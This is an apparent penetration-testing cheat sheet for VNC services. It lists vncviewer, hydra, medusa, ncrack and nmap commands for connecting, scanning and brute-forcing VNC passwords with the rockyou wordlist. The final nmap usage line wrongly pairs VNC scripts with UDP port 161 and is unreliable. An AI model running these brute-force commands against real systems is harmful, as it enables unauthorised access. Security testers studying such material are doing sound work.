Disclaimer: This material is provided solely for educational purposes.
You are fully responsible for how
you use the information.
We
do not encourage any kind of illegal or harmful activity.
Introduction
VNC (Virtual Network Computing) is a desktop sharing system that uses the RFB (Remote Frame Buffer) protocol to control another computer remotely. It transmits keyboard and mouse inputs and updates the graphical screen between computers over a network. VNC is platform-independent, supporting various operating systems, and is commonly used for technical support and remote file access.
Connecting Using VNC Viewer
| Command |
Description |
vncviewer -passwd passwd.txt [TARGET-IP]::[PORT] |
Connects to a VNC server using an IP and port with password authentication from a specified file. |
Brute-Forcing VNC Credentials
| Command |
Description |
hydra -s 5900 -P /usr/share/wordlists/rockyou.txt -t 4 [TARGET-IP] vnc -V |
This command Uses Hydra to crack VNC server passwords on port 5900 using the "rockyou.txt" password list, with detailed output. |
hydra -s 5900 -L [PATH_TO_USERLIST] -P /usr/share/wordlists/rockyou.txt -t 4 [TAGER-IP] vnc -V |
This command uses Hydra to perform a brute force attack on a VNC server, using a list of usernames and passwords on port 5900, with detailed output enabled. |
medusa -h [TARGET-IP] -u [USERNAME] -P /usr/share/wordlists/rockyou.txt -M vnc -T 4 -v 4 |
This command uses Medusa to test VNC server logins at a specific IP address, using one username, multiple passwords, |
ncrack -vv --user [USERNAME] -P /usr/share/wordlists/rockyou.txt vnc://[TARGET-IP]:5900 |
This command runs Ncrack to attempt a password crack on a VNC server using a specified username and password list, with high detail in the output. |
Nmap
| Command |
Description |
ls -la /usr/share/nmap/scripts \| grep "vnc" |
Displays a list of Nmap NSE scripts that are specifically designed for auditing VNC services. This is a quick way to select scripts appropriate for targeted security checks. |
nmap -p 5900 --script vnc* [TARGET-IP] |
This Nmap command scans port 5900 for VNC vulnerabilities and config details at the given IP address. |
Popular NSE Scripts for VNC
Nmap Scripting Engine offers several scripts targeted at assessing VNC services. These scripts can help uncover potential security weaknesses:
| Script Name |
Description |
vnc-info.nse |
Gathers extensive information about the VNC service, including the protocol version and security settings, to help in understanding how the server is configured. |
vnc-brute.nse |
Attempts to brute-force the password of a VNC server, providing insights into the robustness of the existing password policy. |
| Usage |
nmap [TARGET-IP] -Pn -sU -p 161 --script=[SCRIPT-NAME] |